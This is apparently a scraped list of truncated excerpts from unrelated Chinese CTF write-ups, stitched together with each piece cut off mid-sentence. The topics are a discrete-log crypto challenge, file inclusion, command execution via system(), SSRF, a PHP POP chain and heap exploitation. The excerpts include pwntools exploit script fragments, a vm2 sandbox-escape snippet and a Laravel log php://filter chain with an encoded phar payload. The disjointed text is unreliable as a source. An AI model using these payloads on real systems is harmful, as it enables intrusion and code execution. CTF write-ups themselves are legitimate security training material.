2.ez_log题目:from Crypto.Util.number import * from random import * flag=b'key{xxxxxxx}' m=bytes_to_long(flag) p=3006156660704242356836102321001016782090189571028526298055526061772989406357037170723984497344618257575827271367883545096587962708266010793826346841303043716776726799898939374985320242033037 g=3 c=pow(g,m,p) print...
(arch = "amd64",os = "linux",log_level = "debug") #context.terminal = ['tmux','splitw','-h'] context.terminal = ['konsole', '-e', 'sh', '-c'] #context.terminal = ['gnome-terminal', '-e', 'sh', '-c'] file = "./pwn" libc = "./libc.so.6" p = process("....
WHUCTF2020 Writeup - 52hertz师傅 二.ezinclude 1.题目描述 考点: 文件包含漏洞inlude 主界面显示如下图所示: contact.php核心代码如下: 2.解题思路 这道题在contact.php页面有表单提交的选项,提交至thankyou.php页面,通过URL参数及题目提示文件包含,我们尝试往文件包含漏洞渗透。 什么是文件包含漏洞呢? 通过PHP函...
我们首先看到题目 我们可以看到他的php代码写的很简单,我们需要以get的方式传入一个url参数,然后会执行url,也就是说我们这一题可以使用rce。 我们使用system命令,让他执行,然后就简单了,我们先使用最简单的ls看看能不能成功。 可以执行,我们可以直接在里面构造payload的了。 发现了一个类似于flag的奇怪的文件,我们...
from pwn import*context(terminal=['tmux','splitw','-h'],os="linux",#arch="amd64",arch="i386",log_level="debug")#elf=ELF("./over_flow")io=process("./over_flow")#io=remote("61.147.171.105",58664)defdebug():gdb.attach(io)pause()debug()### back_door=0xaaaabaaa0804868B#我直...
console.log(new VM().run(untrusted)); }catch(x){ console.log(x); } 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 方法二: AI检测代码解析 "use strict"; const {VM} = require('vm2'); const untrusted = '(' + function(){ ...
0x07 ezp0p 纯纯的代码审计题目: <?php error_reporting(0); highlight_file(__FILE__); class This{ protected $formatters; public function want(){ echo "what do you want to do?"; } public function __call($method, $attributes) { return $this->format($method, $attributes); } public ...
LCTF2017 2ez4u HCTF2018 heapstorm 0CTF2018 heapstorm2 ... tcache 最近tcache机制的pwn题越来越多,因此必须得明白tcache机制与往常glibc2.23等版本的不同处,tcache的安全检查特别少,因此这类题的难点通常就在如何leak出libc基址以及如何创建重叠堆块。
GKCTF EZ三剑客-EzWeb 看到这个题前端和我自己出的一个题实在是很像,同样是输入一个url,先看题目长啥样吧。 嗯,啥也没有,输入url基本没反应,F12给的提示是?secret,输入后发现: 这就很敏感了,相当于一个 ifconfig 的命令,这个时候应该是SSRF打内网,看内网的存活主机有多少,直接burp抓个包爆破一下有新发现...
//filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log'#payloads='PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQpgAQAAAgAAABEAAAABAAAAAAAJAQAATzozNzoiTW9ub2xvZ1xIYW5kbGVyXEZpbmdlc...